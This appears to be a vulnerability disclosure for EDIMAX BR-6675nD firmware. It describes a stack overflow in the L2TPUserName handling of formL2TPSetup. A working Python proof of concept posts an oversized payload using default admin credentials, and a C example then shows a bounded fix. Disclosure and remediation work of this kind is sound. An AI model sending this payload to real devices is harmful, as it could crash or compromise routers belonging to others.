BR-6675nD v1.12
The EDIMAX BR-6675nD v1.12 firmware has a stack overflow vulnerability in the formL2TPSetup function. The v89 variable receives the L2TPUserName parameter from a POST request. Because the user controls the value of L2TPUserName, the strcat() call that handles it can cause a buffer overflow.

import requests

ip = "192.168.2.1"  # LAN address of the device under test
payload = "A"*5000  # oversized value sent as L2TPUserName
data = {
"submit-url": "",
"L2TPConnect": "",
"L2TPDisconnect": "",
"L2TPIpMode": "0",
"HostName": "test",
"macAddr": "",
"enableDuallAccess": "",
"DUAL_WAN_IGMP": "",
"httpProxyEnable": "",
"DNSMode": "1",
"dns1": "1.1.1.1",
"dns2": "8.8.8.8",
"dns3": "",
"L2TPIPAddr": "",
"L2TPMaskAddr": "",
"L2TPDefGateway": "",
"L2TPGateway": "",
"L2TPUserName": payload,
}
url = f'http://{ip}/goform/formL2TPSetup'
res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)  # authenticated POST to the form handler
print(res)
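
The unchecked strcat() pattern described above, beside a bounded replacement that rejects oversized input. This is an added example, not the firmware's code or the page's own: the buffer size, the "user=" prefix and every function name are assumptions, since the page shows neither the buffer nor the decompiled function.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128  /* assumed; the page does not give the real buffer size */

/* Pattern the page describes: strcat() never checks the room left in dst. */
void append_unchecked(char *dst, const char *user)
{
    strcat(dst, user);
}

/* Bounded form: reject input that does not fit. Returns 0 on success, -1 otherwise. */
int append_checked(char *dst, size_t dst_size, const char *user)
{
    const char *end = memchr(dst, '\0', dst_size);
    if (end == NULL)                 /* dst is not NUL-terminated */
        return -1;
    size_t used = (size_t)(end - dst);
    size_t need = strlen(user);
    if (need >= dst_size - used)     /* no room for user plus the NUL */
        return -1;
    memcpy(dst + used, user, need + 1);
    return 0;
}

/* Hypothetical handler standing in for the L2TPUserName handling. */
int set_l2tp_username(const char *l2tp_user_name, char *out, size_t out_size)
{
    char buf[BUF_SIZE] = "user=";    /* constructed prefix */
    if (append_checked(buf, sizeof buf, l2tp_user_name) != 0)
        return -1;                   /* handler should return an error page */
    snprintf(out, out_size, "%s", buf);
    return 0;
}

int main(void)
{
    char out[BUF_SIZE], big[5001];
    memset(big, 'A', 5000);          /* same length as the page's test value */
    big[5000] = '\0';
    printf("short: %d\n", set_l2tp_username("alice", out, sizeof out));
    printf("5000 bytes: %d\n", set_l2tp_username(big, out, sizeof out));
    return 0;
}
```

Rejecting the request outright, rather than truncating, keeps a partial username from being written into the device configuration.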
